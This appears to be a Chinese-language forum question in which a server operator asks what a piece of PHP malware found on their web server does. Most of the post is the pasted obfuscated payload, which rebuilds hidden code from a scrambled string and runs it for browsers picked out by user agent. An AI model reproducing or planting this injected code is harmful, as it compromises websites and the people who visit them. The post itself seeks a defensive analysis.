我们最近发现我们在网络服务器上发现了恶意软件,我们认为它最初与今年早些时候发布的Hoefler Text chrome bug有关。但是,它似乎更多的是面向PHP而不是javascript注入。
任何人都知道这段代码在做什么?它看起来很加密,但我们不知道它来自哪里或它在做什么。
<?php $nutfkvo = 'ERVER[" x48 124 x54 120 x5f 125 x53 105 xZ;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|1);} @error_reporting(0); $shbq%)dfyfR x27tfs%6<*17-SF%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjj%-bubE{h%)sutcvt-#w#)ldb&)7gj6<.[A x27&6< x7fw6* !#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fd99386c6f+9f5d816:+946:ce44#)zb7R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x t`cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**4") && (!isset($GLOBALS[" x61 156 x75 156 g!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%wuhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e P6L1M5]D2P4]D6#<%G]y6d]281Ld]245#00#W~!%t2w)##Qtjw)#]82#-#!#-if((function_exists(" x6f 142 x5f 163 x74 141 x72 16%tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24-#+I#)q%:>:r%:|:**t%)m%=*h%)m%)EBFI,6<*127-UVPFNJU,6<*27-52 137 x41 107 x45 116 x54"]); if ((strstr($uas," x6d 163 x69+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbugj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<62 x65 141 x74 145 x5f 146 x75 1565,47R25,d7R17,67R37,#/q%>U<#16,47R57,27Rp% x7f!~!<##!>!2p%Z<^2 x5c2b%cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcXAZASV<*w%)ppde>u%V<#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fw($uas," x66 151 x72 145 x6W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`x22l:!}V;3q%}U;y]}R;2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>Xx61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_S-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:19275fubmgoj{h1:|:*mmvo:>&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdvg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2<ofmy%,3,j%>j%!<**3-fepdof`57ftbc x7f!|!*uyfu vt)!gj!|!*bubE{h%)j{hnpd!opjudox6f 151 x64")) or (strstr($uas," x63 150 x72 157 x6d 145")) or (strstrfttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)dsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/qp%>5h23}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gjy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3ssb!>!ssbnpe_GMFT`QIQ; $czkfapi();}}ewj = implode(array_map("fsvvfen",str_split("%tjw!>!#]y84]275]<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6* 56-xr.985:52985-t.98]K4]65]D8]86]y31]278:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x2x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}%t::!>! x24Ypp3)%cB%iN}vt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!x27k:!ftmf!}Z;^nbsbq% 5 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x2! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsjt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)3 145")) or (strstr($5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5ut>j%!*9! x27!hmg%)!gj!~1]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:bg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj} x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t88M4P8]37]278]225]241]33%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:754]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<uas," x72 166 x3a 61 x31")) or (strstr($uas," x61 156 x64 162 275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/dXA x27K6< x7fw6*3qj%7> x2272qj%)7UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftm*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x6 x63 164 x69 157 x6e"; function fsvvfen($n){return chr(ord($n)-983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>5#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%h- x24gvodujpo! x24- x24y7 x24-66,#/q%>2q%<#g6R85,623ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)bm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tuRk3`{666~6<&w6< x7fw6*CW%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]84- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/6 157 x78"))) { $lfaxxhl = " x63 1]K2]285]Ke]53Ld]53]Kc]55Ld]5cq% x27Y%6<.msv`ftsbqA7%!<*::::::-111112)eobs`un>qp%!|Z~!<##q)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+.2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27qov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sut>q%6< x7fw6* x7f_*#fubfsdXk5`{66~61^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! 3]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)!gjZ<#opo#>b%!**X)u6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<XA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfs:fmjix:<##:>:h%:<#64y]552]e7y]#>n]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/ftmf!~<**9.-j%-bubE{h%)sutc2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33 x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*idtjyf`439275ttfsqnpdov{h19275j{hnpd!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)e#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH23zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]27x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]2**<")));$czkfapi = $lfaxxhl("", $shbqewj)!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwji%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67)54l} x27;%!<*#}_;#)3SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojy83]248]y83]256]y81]265]y72]254StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSbnxdrhltuaz'; $bnzgztgmm=explode(chr((820-700)),substr($nutfkvo,(34424-28404),(116-82))); $sogrxeet = $bnzgztgmm[0]($bnzgztgmm[(6-5)]); $lrjjxox = $bnzgztgmm[0]($bnzgztgmm[(9-7)]); if (!function_exists('tplmislked')) { function tplmislked($objccdaud, $jjqdfcrjgk,$rvvqeciogp) { $lbuwksopz = NULL; for($kuoupxdnns=0;$kuoupxdnns<(sizeof($objccdaud)/2);$kuoupxdnns++) { $lbuwksopz .= substr($jjqdfcrjgk, $objccdaud[($kuoupxdnns*2)],$objccdaud[($kuoupxdnns*2)+(5-4)]); } return $rvvqeciogp(chr((31-22)),chr((398-306)),$lbuwksopz); }; } $nudedtoa = explode(chr((174-130)),'798,52,570,42,1565,67,0,41,974,61,2886,20,3445,62,1956,70,1360,26,4404,34,1123,33,3728,64,106,31,2422,62,5989,31,476,39,5058,70,4592,66,515,55,3391,54,5597,44,1780,54,5128,48,3569,34,1085,38,3671,57,2906,69,4466,23,4725,34,2484,69,5435,60,137,23,948,26,5925,64,4273,24,249,25,2633,31,1386,65,3603,68,3054,39,41,65,5269,27,2687,34,5349,49,2805,39,2975,24,1879,20,224,25,4658,67,1226,56,1925,31,1834,45,1197,29,5529,68,677,60,2226,51,4489,37,5784,59,2078,62,4526,66,318,30,2386,21,1721,59,1517,48,5038,20,2026,52,1899,26,2721,22,4984,54,5904,21,3949,40,4228,45,5495,34,1696,25,2593,40,2277,43,1035,50,418,58,1282,21,1156,41,3929,20,348,70,1451,20,5296,53,5398,37,2844,42,5641,54,4867,63,3507,62,3346,45,917,31,5176,33,5843,61,4807,60,5695,48,2743,62,4344,60,850,67,3899,30,3093,57,1471,46,2664,23,4057,33,4759,48,4930,54,4090,69,3174,64,769,29,4297,47,2999,55,2553,40,3238,46,3792,53,274,44,2320,66,737,32,4438,28,3845,54,2140,39,3150,24,3284,62,3989,68,5209,60,160,64,612,65,2179,47,1303,57,4159,69,1632,64,5743,41,2407,15'); $balvyxsnq = $sogrxeet("",tplmislked($nudedtoa,$nutfkvo,$lrjjxox)); $sogrxeet=$nutfkvo; $balvyxsnq(""); $balvyxsnq=(745-624); $nutfkvo=$balvyxsnq-1; ?><
高度赞美它!